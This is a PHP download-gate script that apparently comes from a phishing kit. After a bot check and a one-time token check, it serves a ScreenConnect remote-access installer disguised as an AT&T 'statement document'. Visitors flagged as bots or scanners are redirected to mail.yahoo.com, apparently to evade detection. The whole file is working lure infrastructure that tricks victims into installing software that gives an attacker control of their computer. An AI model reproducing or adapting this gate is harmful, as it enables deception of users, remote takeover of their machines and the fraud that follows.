<?php
session_start();

// CRITICAL: Check if this is a bot from the session
if (isset($_SESSION['XAntibot_bot']) && $_SESSION['XAntibot_bot'] === true) {
    // This is a blacklisted bot - redirect immediately
    header('Location: https://mail.yahoo.com');
    exit;
}

// Check if user was approved by index.php
if (!isset($_SESSION['download_approved']) || $_SESSION['download_approved'] !== true) {
    die('Access denied. <a href="index.php">Please verify first</a>');
}

// Verify token
if (!isset($_GET['token']) || $_GET['token'] !== $_SESSION['download_token']) {
    die('Invalid token. <a href="index.php">Try again</a>');
}

// Check expiration (60 seconds)
if ((time() - $_SESSION['token_time']) > 60) {
    session_destroy();
    die('Token expired. <a href="index.php">Try again</a>');
}

// Clear session (one-time use)
unset($_SESSION['download_approved']);
unset($_SESSION['download_token']);
unset($_SESSION['token_time']);

// File path
$file_path = 'files/ATT_Statement_Document_Record_Number#9561_ScreenConnect.ClientSetup.msi';

if (!file_exists($file_path)) {
    die('File not found.');
}

// Clear buffer
if (ob_get_level()) {
    ob_end_clean();
}

// Download headers
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="' . basename($file_path) . '"');
header('Content-Length: ' . filesize($file_path));
header('Cache-Control: must-revalidate');
header('Pragma: public');

readfile($file_path);
exit;
?>
